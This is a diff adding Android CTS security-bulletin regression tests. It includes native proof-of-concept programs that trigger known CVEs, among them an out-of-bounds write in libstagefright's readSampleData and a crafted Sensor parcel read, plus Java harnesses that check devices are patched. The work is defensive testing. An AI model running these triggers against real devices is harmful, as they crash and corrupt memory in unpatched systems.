+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21118",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ shared_libs: [
+ "libsensor",
+ "libbinder",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
new file mode 100644
index 0000000..e79dc69
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21118/poc.cpp
@@ -0,0 +1,55 @@
+/**
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <binder/Parcel.h>
+#include <sensor/Sensor.h>
+
+#include <fstream>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+using namespace std;
+
+char enable_selective_overload = ENABLE_NONE;
+
+void fillParcel(Parcel &reply) {
+ ifstream inputFile("cve_2023_21118.bin", ios::binary);
+ FAIL_CHECK(inputFile.is_open());
+
+ // Compute size of file
+ inputFile.seekg(0, std::ios::end);
+ std::streampos fileSize = inputFile.tellg();
+ inputFile.seekg(0, std::ios::beg);
+
+ // Fill parcel with file data
+ vector<uint8_t> fileData(fileSize);
+ inputFile.read(reinterpret_cast<char *>(fileData.data()), fileSize);
+ inputFile.close();
+ reply.write(fileData.data(), fileSize);
+ reply.setDataPosition(25044 /* Set data position to required position */);
+}
+
+int main() {
+ Parcel reply;
+ Sensor s;
+ fillParcel(reply);
+ enable_selective_overload = ENABLE_ALL;
+ reply.read(s);
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
new file mode 100644
index 0000000..99c3515
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/Android.bp
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21127",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libstagefright_foundation",
+ "libutils",
+ ],
+ header_libs: [
+ "libstagefright_headers",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ "-O0",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
new file mode 100644
index 0000000..befb449
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21127/poc.cpp
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/NuMediaExtractor.h>
+#include <media/stagefright/foundation/ABuffer.h>
+#include <stdlib.h>
+#include <vector>
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+using namespace android;
+
+char enable_selective_overload = ENABLE_NONE;
+
+constexpr size_t kTrackIndex = 0;
+
+int main(int argc, char **argv) {
+ FAIL_CHECK(argc == 2);
+
+ sp<NuMediaExtractor> extractor = new NuMediaExtractor(NuMediaExtractor::EntryPoint::OTHER);
+ FAIL_CHECK(extractor);
+
+ extractor->setDataSource(nullptr /* httpService */, argv[1]);
+ extractor->selectTrack(kTrackIndex);
+ size_t sampleSize = -1;
+ extractor->getSampleSize(&sampleSize);
+ FAIL_CHECK(sampleSize != -1);
+
+ enable_selective_overload = ENABLE_ALL;
+ std::vector<uint8_t> data(sampleSize);
+ enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+ FAIL_CHECK(data.size() == sampleSize);
+
+ sp<ABuffer> buffer = new ABuffer(data.data(), sampleSize);
+ FAIL_CHECK(buffer);
+
+ // Setting the offset such that the buffer starts from the next byte after the last byte in the
+ // alignment in order to just write into the write protected region of the allocation.
+ // e.g. for a buffer of size 16 bytes,
+ // if 10 bytes are to be written
+ // then the offset should be 7 to cause an OOB write on the 17th byte.
+ size_t offset = MINIMUM_ALIGNMENT - (sampleSize % MINIMUM_ALIGNMENT) + 1;
+ size_t updatedSize = buffer->capacity() - offset;
+ buffer->setRange(offset, updatedSize);
+
+ // Calling the vulnerable function readSampleData() here causes an OOB write.
+ extractor->readSampleData(buffer);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
new file mode 100644
index 0000000..88340f4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2023-21261",
+ defaults: [
+ "cts_hostsidetests_securitybulletin_defaults",
+ ],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libft2",
+ ],
+ cflags: [
+ "-DFT2_BUILD_LIBRARY",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
new file mode 100644
index 0000000..06c9826
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2023-21261/poc.cpp
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ft2build.h>
+#include FT_FREETYPE_H
+#include "../includes/common.h"
+#include <freetype/internal/ftdebug.h>
+
+FT_Face face = nullptr;
+FT_Library library = nullptr;
+
+void exitHandler(void) {
+ if (face) {
+ FT_Done_Face(face);
+ }
+ if (library) {
+ FT_Done_FreeType(library);
+ }
+}
+
+int main(int argc, char **argv) {
+ FAIL_CHECK(argc == 3);
+ atexit(exitHandler);
+ // Initialize FreeType library
+ FT_Error error = FT_Init_FreeType(&library);
+ FAIL_CHECK(!error);
+
+ // Load the font file
+ const int face_index = -1;
+ error = FT_New_Face(library, argv[2], face_index, &face);
+ FAIL_CHECK(!error);
+ if (strcmp(argv[1], "CVE-2022-27406")) {
+ return (face->face_index == face_index) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+ }
+ face->size = nullptr;
+ error = FT_Set_Char_Size(face, 0 /* char_width */, 0 /* char_height */,
+ 0 /* horz_resolution */, 0 /* vert_resolution */);
+ FAIL_CHECK((error == FT_THROW(Invalid_Size_Handle)));
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
index 0fdadb6..afc893c 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.c
@@ -24,6 +24,7 @@
#include <signal.h>
#include "memutils.h"
+map_struct_t s_free_list[MAX_ENTRIES] = {};
map_struct_t s_mem_map[MAX_ENTRIES] = {};
void exit_handler(void) {
size_t page_size = getpagesize();
diff --git a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
index 73f798b..251ccc4 100644
--- a/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
+++ b/hostsidetests/securitybulletin/securityPatch/includes/memutils.h
@@ -60,7 +60,7 @@
static int s_free_write_index = 0;
static int s_free_read_index = 0;
static int s_free_list_size = 0;
-map_struct_t s_free_list[MAX_ENTRIES];
+extern map_struct_t s_free_list[MAX_ENTRIES];
#endif /* CHECK_USE_AFTER_FREE_WITH_WINDOW_SIZE */
extern map_struct_t s_mem_map[MAX_ENTRIES];
#if (!(defined CHECK_OVERFLOW) && !(defined CHECK_UNDERFLOW))
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
index a5e6557..603292a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_29374.java
@@ -17,10 +17,12 @@
package android.security.cts;
import static org.junit.Assert.*;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.KernelVersionHost;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
@@ -36,6 +38,7 @@
@AsbSecurityTest(cveBugId = 174737879)
@Test
public void testPocCVE_2020_29374() throws Exception {
+ assumeTrue(KernelVersionHost.isKernelVersionGreaterThanEqualTo(getDevice(), "5.4.0"));
AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2020-29374", getDevice(),60);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
new file mode 100644
index 0000000..3955b56
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_39622.java
@@ -0,0 +1,92 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_39622 extends NonRootSecurityTestCase {
+ private static final String GBOARD_PKG_NAME = "com.google.android.inputmethod.latin";
+ private static final String RECORD_AUDIO_PERMISSION = "android.permission.RECORD_AUDIO";
+
+ @AsbSecurityTest(cveBugId = 192663648)
+ @Test
+ public void testPocCVE_2021_39622() {
+ ITestDevice iTestDevice = null;
+ boolean wasPermissionGranted = false;
+ try {
+ final String testPkg = "android.security.cts.CVE_2021_39622";
+ final String testClass = testPkg + "." + "DeviceTest";
+ final String testApp = "CVE-2021-39622.apk";
+ final String mIdGboard = "/com.android.inputmethod.latin.LatinIME";
+ iTestDevice = getDevice();
+ assumeTrue(
+ AdbUtils.runCommandLine("pm list packages", iTestDevice)
+ .contains(GBOARD_PKG_NAME));
+
+ if (AdbUtils.runCommandLine(
+ "dumpsys package "
+ + GBOARD_PKG_NAME
+ + " | grep "
+ + RECORD_AUDIO_PERMISSION,
+ iTestDevice)
+ .contains("granted=true")) {
+ // android.permission.RECORD_AUDIO has flag USER_SENSITIVE_WHEN_GRANTED
+ AdbUtils.runCommandLine(
+ "pm revoke " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+ iTestDevice);
+ wasPermissionGranted = true;
+ }
+
+ if (!AdbUtils.runCommandLine("ime list -s", iTestDevice)
+ .contains(GBOARD_PKG_NAME + mIdGboard)) {
+ AdbUtils.runCommandLine("ime enable " + GBOARD_PKG_NAME + mIdGboard, iTestDevice);
+ }
+
+ AdbUtils.runCommandLine(
+ "ime set " + GBOARD_PKG_NAME + RECORD_AUDIO_PERMISSION, iTestDevice);
+ installPackage(testApp);
+ runDeviceTests(testPkg, testClass, "testPocCVE_2021_39622");
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ // revert RECORD_AUDIO permission changes for Gboard
+ if (wasPermissionGranted) {
+ AdbUtils.runCommandLine(
+ "pm grant " + GBOARD_PKG_NAME + " " + RECORD_AUDIO_PERMISSION,
+ iTestDevice);
+ }
+
+ // Revert input method changes
+ AdbUtils.runCommandLine("ime reset", iTestDevice);
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
index cc9d347..c12cf33 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20112.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -17,10 +17,10 @@
package android.security.cts;
import static org.junit.Assume.assumeNoException;
-import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.UserUtils;
import com.android.sts.common.tradefed.testtype.RootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -30,6 +30,7 @@
@RunWith(DeviceJUnit4ClassRunner.class)
public class CVE_2022_20112 extends RootSecurityTestCase {
+ private static final String FEATURE_AUTOMOTIVE = "android.hardware.type.automotive";
// b/206987762
// Vulnerable module : com.android.settings
@@ -38,51 +39,31 @@
@AsbSecurityTest(cveBugId = 206987762)
@Test
public void testPocCVE_2022_20112() {
- final String testPkg = "android.security.cts.CVE_2022_20112";
- ITestDevice device = null;
- int currentUser = -1;
- int newUser = -1;
try {
- device = getDevice();
+ // This setting is not supported on automotive
+ if (isAutomotive()) return;
- // Device wakeup and unlock
- AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
- AdbUtils.runCommandLine("wm dismiss-keyguard", device);
+ final ITestDevice device = getDevice();
+ try (AutoCloseable asGuestUser =
+ new UserUtils.SecondaryUser(device)
+ .name("CTSUser")
+ .guest()
+ .doSwitch()
+ .withUser()) {
+ // Install PoC application in guest user
+ installPackageAsUser(
+ "CVE-2022-20112.apk", false /* grantPermission */, device.getCurrentUser());
- // Get current user
- currentUser = device.getCurrentUser();
-
- // Create new guest user 'CTSUser' for test
- newUser = device.createUser("CTSUser", true, false);
-
- // Start new guest user 'CTSUser'
- assumeTrue("Unable to create new guest user", device.startUser(newUser, true));
-
- // Switch to new user 'CTSUser'
- assumeTrue("Unable to switch to guest user", device.switchUser(newUser));
-
- // Install PoC application
- installPackage("CVE-2022-20112.apk");
-
- runDeviceTests(testPkg, testPkg + ".DeviceTest", "testprivateDnsPreferenceController");
+ final String testPkg = "android.security.cts.CVE_2022_20112";
+ runDeviceTests(
+ testPkg, testPkg + ".DeviceTest", "testPrivateDnsPreferenceController");
+ }
} catch (Exception e) {
assumeNoException(e);
- } finally {
- try {
- if (currentUser != -1) {
- // Switch back to previous user
- device.switchUser(currentUser);
- }
- if (newUser != -1) {
- // Stop user 'CTSUser'
- device.stopUser(newUser);
-
- // Remove user 'CTSUser'
- device.removeUser(newUser);
- }
- } catch (Exception e) {
- // Ignore exception here
- }
}
}
+
+ private boolean isAutomotive() throws Exception {
+ return getDevice().hasFeature(FEATURE_AUTOMOTIVE);
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
new file mode 100644
index 0000000..e492eb0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2022_20357.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocStatusAsserter.assertNotVulnerableExitCode;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2022_20357 extends NonRootSecurityTestCase {
+
+ // b/214999987
+ // Vulnerability Behaviour : EXIT_VULNERABLE
+ // Vulnerable Function : writeToParcel (As per AOSP code)
+ // Vulnerable Library : libgui (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 214999987)
+ @Test
+ public void testPocCVE_2022_20357() {
+ try {
+ NativePoc.builder()
+ .pocName("CVE-2022-20357")
+ .asserter(assertNotVulnerableExitCode())
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
new file mode 100644
index 0000000..5d412d4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_20944.java
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_20944 extends NonRootSecurityTestCase {
+
+ // b/244154558
+ // Vulnerable module : services.jar
+ // Vulnerable module : Not applicable
+ // Is Play Managed : No
+ @AsbSecurityTest(cveBugId = 244154558)
+ @Test
+ public void testPocCVE_2023_20944() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_20944_test";
+
+ // Install the test and target apps
+ installPackage("CVE-2023-20944-test.apk");
+ installPackage("CVE-2023-20944-target.apk");
+
+ // Run the test "testCVE_2023_20944"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_20944");
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
new file mode 100644
index 0000000..202fb61
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21107.java
@@ -0,0 +1,83 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.device.UserInfo;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.Map;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21107 extends NonRootSecurityTestCase {
+ private int mWorkUserId = -1;
+
+ private AutoCloseable withManagedUser() throws Exception {
+ final ITestDevice device = getDevice();
+ String output =
+ AdbUtils.runCommandLine(
+ "pm create-user --profileOf 0 --managed CVE_2023_21107_TestUser", device);
+ Map<Integer, UserInfo> mapOfUserInfos = device.getUserInfos();
+ for (UserInfo userInfo : mapOfUserInfos.values()) {
+ if (userInfo.userName().equals("CVE_2023_21107_TestUser")) {
+ mWorkUserId = userInfo.userId();
+ }
+ }
+ assumeTrue(mWorkUserId != -1);
+ assumeTrue(device.startUser(mWorkUserId, true /* waitFlag */));
+
+ return new AutoCloseable() {
+ @Override
+ public void close() throws Exception {
+ assumeTrue(device.stopUser(mWorkUserId, true /* waitFlag */, true /* forceFlag */));
+ assumeTrue(device.removeUser(mWorkUserId));
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+ }
+ };
+ }
+
+ // b/259385017
+ // Vulnerable module : Settings.apk
+ @AsbSecurityTest(cveBugId = 259385017)
+ @Test
+ public void testPocCVE_2023_21107() {
+ try {
+ final String testPkg = "android.security.cts.CVE_2023_21107_test";
+ try (AutoCloseable managedUser = withManagedUser()) {
+ // Install the helper app
+ installPackage("CVE-2023-21107-helper.apk", "--user " + mWorkUserId);
+
+ // Install the test app
+ installPackage("CVE-2023-21107-test.apk");
+
+ // Run the test "testCVE_2023_21107"
+ runDeviceTests(testPkg, testPkg + ".DeviceTest", "testCVE_2023_21107");
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
new file mode 100644
index 0000000..b0eb7c6
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21118.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21118 extends NonRootSecurityTestCase {
+
+ @AsbSecurityTest(cveBugId = 269014004)
+ @Test
+ public void testPocCVE_2023_21118() {
+ try {
+ String binaryName = "CVE-2023-21118";
+ String inputFile = "cve_2023_21118.bin";
+
+ String[] signals = {TombstoneUtils.Signals.SIGSEGV};
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binaryName)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern(
+ "libsensor.so", "android::Sensor::unflatten"))
+ .setSignals(signals);
+
+ // Running the PoC for CVE-2023-21118
+ NativePoc.builder()
+ .pocName(binaryName)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
new file mode 100644
index 0000000..1564151
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2023_21127.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static com.android.sts.common.NativePocCrashAsserter.assertNoCrash;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.NativePoc;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.sts.common.util.TombstoneUtils;
+import com.android.sts.common.util.TombstoneUtils.Config.BacktraceFilterPattern;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2023_21127 extends NonRootSecurityTestCase {
+
+ // b/275418191
+ // Vulnerability Behaviour : SIGSEGV in self
+ // Vulnerable Library : libstagefright (As per AOSP code)
+ // Vulnerable Function : readSampleData (As per AOSP code)
+ @AsbSecurityTest(cveBugId = 275418191)
+ @Test
+ public void testPocCVE_2023_21127() {
+ try {
+ // Create the crash config
+ String binary = "CVE-2023-21127";
+ String inputFile = "cve_2023_21127.ogg";
+ TombstoneUtils.Config crashConfig =
+ new TombstoneUtils.Config()
+ .setProcessPatterns(binary)
+ .setBacktraceIncludes(
+ new BacktraceFilterPattern("libstagefright", "readSampleData"))
+ .setSignals(TombstoneUtils.Signals.SIGSEGV);
+
+ // Build and run the Native PoC
+ NativePoc.builder()
+ .pocName(binary)
+ .args(inputFile)
+ .resources(inputFile)
+ .asserter(assertNoCrash(crashConfig))
+ .build()
+ .run(this);
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
